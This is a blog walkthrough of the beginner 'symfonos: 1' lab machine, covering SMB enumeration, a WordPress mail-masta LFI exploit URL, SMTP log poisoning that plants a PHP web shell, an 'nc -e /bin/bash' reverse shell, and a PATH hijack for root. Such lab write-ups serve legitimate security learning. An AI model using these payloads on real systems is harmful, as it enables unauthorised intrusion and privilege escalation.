symfonos: 1 Walkthrough

3 min readDec 25, 2020

--

Description :-

Beginner real life based machine designed to teach a interesting way of obtaining a low priv shell. SHOULD work for both VMware and Virtualbox.

Name: symfonos: 1
Difficulty: Beginner
Tested: VMware Workstation 15 Pro & VirtualBox 6.0
DHCP Enabled

Note: You may need to update your host file for symfonos.local

Scanning

We always start with network scanning, Let’s find the target IP address by running netdiscover.

$ sudo netdiscover -i vboxnet0 -r 10.10.10.1/16

As we saw in netdiscover result. Our target ip address is 10.10.10.22.

Our next step is scanning the target machine. let’s start with nmap.

$ nmap -p- -sV 10.10.10.22

Enumeration

SMB Share folder

$ smbclient //10.10.10.22/anonymous

smb: \> get attention.txt

$ cat attention.txt

Here, we have a user Zeus and some passwords ‘epidioko’, ‘qwerty’ and ‘baseball’!

i tried to login smb with user helios and with three passwords. and luckily

helios:qwerty worked

$ smbclient -U helios //10.10.10.22/helios

let’s check out both the files research.txt, todo.txt

todo.txt gives a hint to work on /h3l105. let’s quickly visit http://10.10.10.22/h3l105.

heyy..!!! wordpress is here. but we need to edit out hosts file with symfonos.local.

$ vim /etc/hosts

Exploiting..!!

Now we’ll be using wpscan for further enumeration.

$ wpscan — url http://symfonos.local/h3l105 -e ap

mail-masta 1.1 is Vulnerable with LFI.

EDB-ID:

40290

http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

In addition to convert LFI to RCE we’ll be using SMTP log poison approach and therefore we connect to SMTP service via telnet and then type the following command to inject malicious php code.

$ telnet 10.10.10.22 25

MAIL FROM: <dark0>

RCPT TO: Helios

data

<?php system($_GET[‘c’]); ?>

Hereby, we can take our reverse shell.

http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd&c=nc -e /bin/bash 10.10.10.22 1234

hit the url and turn on listener.

$ python3 -c ‘import pty; pty.spawn(“/bin/bash”)’

$ find / -perm -u=s -type f 2>/dev/null

Way to root ..!!!!

$ cd /tmp
$ echo “/bin/sh” > curl
$ chmod 777 curl
$ echo $PATH
$ export PATH=/tmp:$PATH
$ /opt/statuscheck
# id
# cd /root
# cat proof.txt

That’s it..!! Thanks for reading. Stay tuned for similar walkthrough and much more than this.

:- Dark-0

Sign up to discover human stories that deepen your understanding of the world.

Free

Distraction-free reading. No ads.

Organize your knowledge with lists and highlights.

Tell your story. Find your audience.

Membership

Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app

Written by Dark-0

Learning stuffs in Cybersecurity, Preparing for OSCP certification. #penetration_tester, CTF Player, Bug Hunter. https://twitter.com/dark0sombre

No responses yet

Write a response

What are your thoughts?

Also publish to my profile

Help
Status
About
Careers
Press
Blog
Privacy
Terms
Text to speech
Teams